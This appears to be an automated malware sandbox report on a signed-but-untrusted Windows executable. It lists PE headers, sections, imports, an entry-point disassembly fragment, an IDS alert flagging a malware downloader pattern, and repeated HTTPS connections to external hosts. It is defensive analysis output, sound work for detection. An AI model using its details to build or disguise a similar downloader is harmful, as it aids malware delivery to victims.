                                                        SHA512:e5fae7426e750146275dc91004378503555d068bcf60446d9b4ed1a082a95889fb1cfdf05f857a1d454681763bf24454f27410cd8086faed75edc2fa157a301c
                                                        SSDEEP:24576:yiGFaq43NvCl4+wlZdujTrlsJAvOnMJ/QOea:yiGFu3NvIwSdsJUCMJ/qa
                                                        TLSH:4B151262F600D9AAD4318F718DAFD196EAD17E2528650B8B7F9D7B2FACB1050C10F225
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@
                                                        Icon Hash:0e13672535353f1c
                                                        Entrypoint:0x403348
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:ced282d9b261d1462772017fe2f6972b
                                                        Signature Valid:false
                                                        Signature Issuer:CN="Genfundet Klimaeksperter trichloromethyl ", E=frsteviolinerne@Spayad.Nat, L=Puls, S=Schleswig-Holstein, C=DE
                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                        Error Number:-2146762487
                                                        Not Before, Not After
                                                        • 03/03/2024 03:35:28 03/03/2027 03:35:28
                                                        Subject Chain
                                                        • CN="Genfundet Klimaeksperter trichloromethyl ", E=frsteviolinerne@Spayad.Nat, L=Puls, S=Schleswig-Holstein, C=DE
                                                        Version:3
                                                        Thumbprint MD5:7F4300F89CB33F3547D88A3CF12D3064
                                                        Thumbprint SHA-1:6744129A179DDD70100E4EF2E477E7017324962E
                                                        Thumbprint SHA-256:F5A72CA616B49A6ACBAA0063F9BC40694B0F283A502262C92A5E0E69F2EE0F0F
                                                        Serial:2CC20419A347B6321BC816E32297152DFB393513
                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 0040A198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004080B8h]
                                                        call dword ptr [004080BCh]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042F42Ch], eax
                                                        je 00007F0D889D8723h
                                                        push ebx
                                                        call 00007F0D889DB886h
                                                        cmp eax, ebx
                                                        je 00007F0D889D8719h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082A0h
                                                        push esi
                                                        call 00007F0D889DB802h
                                                        push esi
                                                        call dword ptr [004080CCh]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F0D889D86FDh
                                                        push 0000000Bh
                                                        call 00007F0D889DB85Ah
                                                        push 00000009h
                                                        call 00007F0D889DB853h
                                                        push 00000007h
                                                        mov dword ptr [0042F424h], eax
                                                        call 00007F0D889DB847h
                                                        cmp eax, ebx
                                                        je 00007F0D889D8721h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F0D889D8719h
                                                        or byte ptr [0042F42Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408038h]
                                                        push ebx
                                                        call dword ptr [00408288h]
                                                        mov dword ptr [0042F4F8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00429850h
                                                        call dword ptr [0040816Ch]
                                                        push 0040A188h
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x41dd0 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0xdac50 | 0x13e0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0x6457 | 0x6600 | f6e38befa56abea7a550141c731da779 | False | 0.6682368259803921 | data | 6.434985703212657 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0x8000 | 0x1380 | 0x1400 | 569269e9338b2e8ce268ead1326e2b0b | False | 0.4625 | data | 5.2610038973135005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0xa000 | 0x25538 | 0x600 | 17edd496e40111b5a48947c480fda13c | False | 0.4635416666666667 | data | 4.133728555004788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata | 0x30000 | 0x28000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc | 0x58000 | 0x41dd0 | 0x41e00 | 51f103b856396aac282c5bd5a24beff1 | False | 0.6063619248102466 | data | 5.8960782160116745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_ICON | 0x583b8 | 0x130ca | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.998410786148207
                                                        RT_ICON | 0x6b488 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.40775464332189754
                                                        RT_ICON | 0x7bcb0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.4554866512507883
                                                        RT_ICON | 0x85158 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | United States | 0.462218045112782
                                                        RT_ICON | 0x8b940 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4729667282809612
                                                        RT_ICON | 0x90dc8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.46835144071799717
                                                        RT_ICON | 0x94ff0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5149377593360995
                                                        RT_ICON | 0x97598 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5457317073170732
                                                        RT_ICON | 0x98640 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.6073770491803279
                                                        RT_ICON | 0x98fc8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6719858156028369
                                                        RT_DIALOG | 0x99430 | 0x100 | data | English | United States | 0.5234375
                                                        RT_DIALOG | 0x99530 | 0x11c | data | English | United States | 0.6056338028169014
                                                        RT_DIALOG | 0x99650 | 0xc4 | data | English | United States | 0.5918367346938775
                                                        RT_DIALOG | 0x99718 | 0x60 | data | English | United States | 0.7291666666666666
                                                        RT_GROUP_ICON | 0x99778 | 0x92 | Targa image data - Map 32 x 12490 x 1 +1 | English | United States | 0.7191780821917808
                                                        RT_VERSION | 0x99810 | 0x27c | data | English | United States | 0.5
                                                        RT_MANIFEST | 0x99a90 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                                        DLL | Import
                                                        ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                        SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                        ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                        COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                        USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                        GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                        KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
                                                        Language of compilation system | Country where language is spoken | Map
                                                        English | United States |
                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                        2024-12-05T17:03:01.276027+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49751 | 142.250.217.238 | 443 | TCP
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Dec 5, 2024 17:03:35.152853966 CET49757443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:35.153028011 CET49757443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:35.153096914 CET49757443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:35.153142929 CET44349757142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:35.225111008 CET49758443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:35.225127935 CET44349758142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:35.225254059 CET49758443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:35.225579977 CET49758443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:35.225616932 CET44349758142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:35.493453026 CET44349758142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:35.493746042 CET49758443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:35.494045019 CET49758443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:35.494069099 CET44349758142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:35.494139910 CET49758443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:35.494163990 CET44349758142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:35.805222988 CET44349758142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:35.805411100 CET49758443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:35.805453062 CET44349758142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:35.805480957 CET44349758142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:35.805633068 CET44349758142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:35.805641890 CET49758443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:35.805797100 CET49758443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:35.805963993 CET49758443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:35.806000948 CET44349758142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:45.833333015 CET49759443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:45.833384991 CET44349759142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:45.833632946 CET49759443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:45.833772898 CET49759443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:45.833792925 CET44349759142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:46.106663942 CET44349759142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:46.106950998 CET49759443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:46.107426882 CET49759443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:46.107497931 CET44349759142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:46.107521057 CET49759443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:46.107542992 CET44349759142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:46.381727934 CET44349759142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:46.381906986 CET49759443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:46.381951094 CET44349759142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:46.382031918 CET49759443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:46.382067919 CET44349759142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:46.382137060 CET49759443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:46.382216930 CET49759443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:46.406450033 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:46.406533957 CET44349760142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:46.406734943 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:46.406932116 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:46.406981945 CET44349760142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:46.673839092 CET44349760142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:46.674004078 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:46.674252987 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:46.674266100 CET44349760142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:46.674379110 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:46.674387932 CET44349760142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:46.991429090 CET44349760142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:46.991523981 CET44349760142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:46.991749048 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:46.991801023 CET44349760142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:46.992110014 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:46.992110014 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:46.992178917 CET44349760142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:46.992230892 CET44349760142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:46.992438078 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:46.992438078 CET49760443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:57.033579111 CET49761443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:57.033688068 CET44349761142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:57.034290075 CET49761443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:57.034290075 CET49761443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:57.034430981 CET44349761142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:57.310188055 CET44349761142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:57.310374022 CET49761443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:57.310700893 CET49761443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:57.310714960 CET44349761142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:57.310991049 CET49761443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:57.311005116 CET44349761142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:57.594980955 CET44349761142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:57.595068932 CET44349761142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:57.595160961 CET49761443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:57.595372915 CET49761443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:57.595670938 CET49761443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:03:57.595710039 CET44349761142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:03:57.612014055 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:57.612051010 CET44349762142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:57.612303972 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:57.612574100 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:57.612592936 CET44349762142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:57.882703066 CET44349762142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:57.882900000 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:57.883477926 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:57.883477926 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:57.883544922 CET44349762142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:57.883574963 CET44349762142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:58.200768948 CET44349762142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:58.200994015 CET44349762142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:58.201005936 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:58.201067924 CET44349762142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:58.201181889 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:58.201203108 CET44349762142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:03:58.201226950 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:58.201389074 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:58.201438904 CET49762443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:03:58.201488972 CET44349762142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:08.218487024 CET49763443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:08.218596935 CET44349763142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:08.218918085 CET49763443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:08.219043016 CET49763443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:08.219093084 CET44349763142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:08.493686914 CET44349763142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:08.494026899 CET49763443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:08.494302988 CET49763443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:08.494345903 CET44349763142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:08.494440079 CET49763443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:08.494477034 CET44349763142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:08.765697002 CET44349763142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:08.765896082 CET44349763142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:08.765980959 CET49763443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:08.766079903 CET49763443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:08.766079903 CET49763443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:08.790910006 CET49764443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:08.790993929 CET44349764142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:08.791171074 CET49764443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:08.791307926 CET49764443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:08.791352987 CET44349764142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:09.064153910 CET44349764142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:09.064347029 CET49764443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:09.064707994 CET49764443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:09.064773083 CET44349764142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:09.064923048 CET49764443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:09.064961910 CET44349764142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:09.077003002 CET49763443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:09.077080011 CET44349763142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:09.383780956 CET44349764142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:09.383954048 CET44349764142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:09.384056091 CET49764443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:09.384116888 CET44349764142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:09.384133101 CET49764443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:09.384145021 CET44349764142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:09.384268999 CET49764443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:09.384412050 CET49764443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:09.384464979 CET44349764142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:19.419135094 CET49765443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:19.419230938 CET44349765142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:19.419447899 CET49765443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:19.419778109 CET49765443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:19.419826031 CET44349765142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:19.690006018 CET44349765142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:19.690140963 CET49765443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:19.690749884 CET49765443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:19.690757990 CET44349765142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:19.690896034 CET49765443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:19.690901041 CET44349765142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:19.970009089 CET44349765142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:19.970141888 CET49765443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:19.970283985 CET49765443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:19.970365047 CET44349765142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:19.970489025 CET49765443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:19.985491037 CET49766443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:19.985519886 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:19.985675097 CET49766443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:19.985846996 CET49766443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:19.985867023 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:20.254859924 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:20.255193949 CET49766443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:20.259552956 CET49766443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:20.259613991 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:20.259756088 CET49766443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:20.259778976 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:20.580965996 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:20.581176043 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:20.581196070 CET49766443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:20.581245899 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:20.581377983 CET49766443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:20.581410885 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:20.581470013 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:20.581772089 CET49766443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:20.583789110 CET49766443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:04:20.583870888 CET44349766142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:04:30.620160103 CET49767443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:30.620266914 CET44349767142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:30.620553017 CET49767443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:30.620670080 CET49767443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:30.620708942 CET44349767142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:30.895524025 CET44349767142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:30.895824909 CET49767443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:30.895864964 CET49767443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:30.898511887 CET44349767142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:30.898778915 CET49767443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:30.901387930 CET49767443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:30.901457071 CET44349767142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:30.902513981 CET44349767142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:30.902801037 CET49767443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:30.903202057 CET49767443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:30.946434021 CET44349767142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:31.172837973 CET44349767142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:04:31.173028946 CET49767443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:04:31.173073053 CET44349767142.250.217.238192.168.11.20
